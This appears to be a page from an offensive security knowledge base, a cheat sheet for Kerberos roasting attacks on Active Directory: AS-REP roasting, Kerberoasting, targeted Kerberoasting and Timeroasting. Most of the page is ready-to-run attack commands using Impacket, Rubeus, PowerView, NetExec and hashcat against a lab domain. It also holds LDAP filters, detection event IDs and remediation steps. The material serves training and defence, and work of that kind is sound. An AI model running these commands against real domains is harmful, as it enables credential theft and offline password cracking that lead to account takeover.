Operator On The Wire
← Back to Knowledge Base
OOTW / Chapter IV - Active Directory / 03. Kerberos / Roasting

Matrix

TechniqueWhat we needWhat we requestLinux abuseWindows abuseCrackDetectionCleanup and remediation
AS-REP RoastingValid username list or domain credentials. Target account has DONT_REQ_PREAUTH set.AS-REP for the target user without Kerberos pre-authentication.GetNPUsers.py ootw.local/ -dc-ip 10.10.10.200 -usersfile users.txt -format hashcat -outputfile asrep.hashesRubeus.exe asreproast /format:hashcat /outfile:asrep.hasheshashcat -m 18200 asrep.hashes /usr/share/wordlists/rockyou.txtEvent ID 4768 where pre-authentication is not used. Watch bursts of AS-REQs against many users.Disable "Do not require Kerberos preauthentication". Rotate cracked passwords. Prefer long random passwords and managed service accounts.
KerberoastingAny domain user. Target account has one or more SPNs. Human-managed service accounts are the usual target.TGS for the service SPN. The ticket is encrypted with the service account secret.GetUserSPNs.py ootw.local/student:'student' -dc-ip 10.10.10.200 -request -outputfile kerberoast.hashesRubeus.exe kerberoast /nowrap /outfile:kerberoast.hasheshashcat -m 13100 kerberoast.hashes /usr/share/wordlists/rockyou.txt for RC4, hashcat -m 19600 for AES128, hashcat -m 19700 for AES256.Event ID 4769. Watch high volume TGS requests, RC4 ticket requests, and requests for uncommon services.Use gMSA where possible. Use long random service account passwords. Disable RC4 where operationally possible. Rotate cracked service account passwords.
Targeted KerberoastingACL control over a user object, usually GenericAll, GenericWrite, WriteProperty, WriteSPN, or equivalent write access to servicePrincipalName.Temporarily add an SPN to the controlled user, request a TGS, then remove the SPN.python3 targetedKerberoast.py -vv -d ootw.local -u student -p 'student' --request-user target.user --dc-ip 10.10.10.200Set-DomainObject -Identity target.user -Set @{serviceprincipalname='nonexistent/target'} -Verbose then Get-DomainSPNTicket -SPN 'nonexistent/target' -OutputFormat HashcatSame as Kerberoasting: hashcat -m 13100, 19600, or 19700 depending on the ticket type.Event ID 4738 or directory change events for servicePrincipalName, followed by 4769 for the new SPN.Remove the malicious SPN. Review delegated ACLs. Remove unnecessary write privileges. Rotate the target password if the hash was exposed.
TimeroastingAccess to the DC time service over UDP/123. Target is a machine account ending in $.MS-SNTP response protected by the machine account secret.sudo nxc smb 10.10.10.200 -M timeroast or use Timeroast.Usually performed from Linux tooling. Windows hosts can still validate cracked machine credentials after cracking.hashcat -m 31300 timeroast.hashes /usr/share/wordlists/rockyou.txtUDP/123 requests to domain controllers from unusual hosts. Look for large sweeps against machine accounts.Restrict who can reach DC NTP where possible. Rotate exposed machine account passwords. Investigate weak or stale computer account passwords.

AS-REP enumeration

kerbrute userenum -d ootw.local --dc 10.10.10.200 users.txt
GetNPUsers.py ootw.local/ -dc-ip 10.10.10.200 -usersfile users.txt -format hashcat -outputfile asrep.hashes
nxc ldap 10.10.10.200 -u student -p 'student' --asreproast asrep.hashes

AS-REP cracking

hashcat -m 18200 asrep.hashes /usr/share/wordlists/rockyou.txt -r rules/best64.rule -O -w 3
hashcat -m 18200 asrep.hashes /usr/share/wordlists/rockyou.txt --show

Kerberoast enumeration

GetUserSPNs.py ootw.local/student:'student' -dc-ip 10.10.10.200
ldapsearch -x -H ldap://10.10.10.200 -D "ootw\\student" -w 'student' -b "DC=ootw,DC=local" "(servicePrincipalName=*)" servicePrincipalName sAMAccountName
nxc ldap 10.10.10.200 -u student -p 'student' --kerberoast kerberoast.hashes

Kerberoast targeted request

GetUserSPNs.py ootw.local/student:'student' -dc-ip 10.10.10.200 -request-user svc_sql
GetUserSPNs.py ootw.local/student:'student' -dc-ip 10.10.10.200 -request -outputfile kerberoast.hashes

Kerberoast with alternate authentication

GetUserSPNs.py ootw.local/student -dc-ip 10.10.10.200 -hashes :<NTLM_HASH> -request
KRB5CCNAME=/tmp/student.ccache GetUserSPNs.py ootw.local/student -k -dc-ip 10.10.10.200 -request
GetUserSPNs.py ootw.local/student -aesKey <HEX_AESKEY> -dc-ip 10.10.10.200 -request

Kerberoast cracking

hashcat -m 13100 kerberoast.hashes /usr/share/wordlists/rockyou.txt -r rules/best64.rule -O -w 3
hashcat -m 19600 kerberoast.hashes /usr/share/wordlists/rockyou.txt
hashcat -m 19700 kerberoast.hashes /usr/share/wordlists/rockyou.txt
hashcat -m 13100 kerberoast.hashes /usr/share/wordlists/rockyou.txt --show

Windows SPN enumeration

Get-DomainUser -SPN | Select-Object samaccountname,serviceprincipalname
Get-NetUser -SPN | ?{ $_.SPN -match 'mssql|cifs|http|ldap' }
setspn.exe -Q */*

Windows Kerberoasting

Rubeus.exe kerberoast /nowrap /outfile:kerberoast.hashes
Rubeus.exe kerberoast /spn:MSSQLSvc/sql01.ootw.local:1433 /simple /nowrap

Targeted Kerberoast from Linux

python3 targetedKerberoast.py -vv -d ootw.local -u student -p 'student' --request-user target.user --dc-ip 10.10.10.200
hashcat -m 13100 target.hash /usr/share/wordlists/rockyou.txt

Targeted Kerberoast from Windows

Set-DomainObject -Identity target.user -Set @{serviceprincipalname='nonexistent/target'} -Verbose
Get-DomainSPNTicket -SPN 'nonexistent/target' -OutputFormat Hashcat
Set-DomainObject -Identity target.user -Clear serviceprincipalname -Verbose

Timeroasting

sudo nxc smb 10.10.10.200 -M timeroast
hashcat -m 31300 timeroast.hashes /usr/share/wordlists/rockyou.txt
hashcat -m 31300 timeroast.hashes /usr/share/wordlists/rockyou.txt --show

LDAP filters

AS-REP roastable users:
(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))

Kerberoastable users:
(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))

Enabled service accounts with SPNs:
(&(objectCategory=person)(objectClass=user)(servicePrincipalName=*)(!(userAccountControl:1.2.840.113556.1.4.803:=2)))

LDAP command examples

ldapsearch -x -H ldap://10.10.10.200 -D "ootw\\student" -w 'student' -b "DC=ootw,DC=local" "(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))" sAMAccountName userAccountControl
ldapsearch -x -H ldap://10.10.10.200 -D "ootw\\student" -w 'student' -b "DC=ootw,DC=local" "(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt))" sAMAccountName servicePrincipalName

Response checks

Get-ADUser -LDAPFilter "(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))" -Properties userAccountControl
Get-ADUser -LDAPFilter "(&(objectCategory=person)(objectClass=user)(servicePrincipalName=*))" -Properties servicePrincipalName,msDS-SupportedEncryptionTypes
Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4768} | Select-Object -First 20
Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4769} | Select-Object -First 20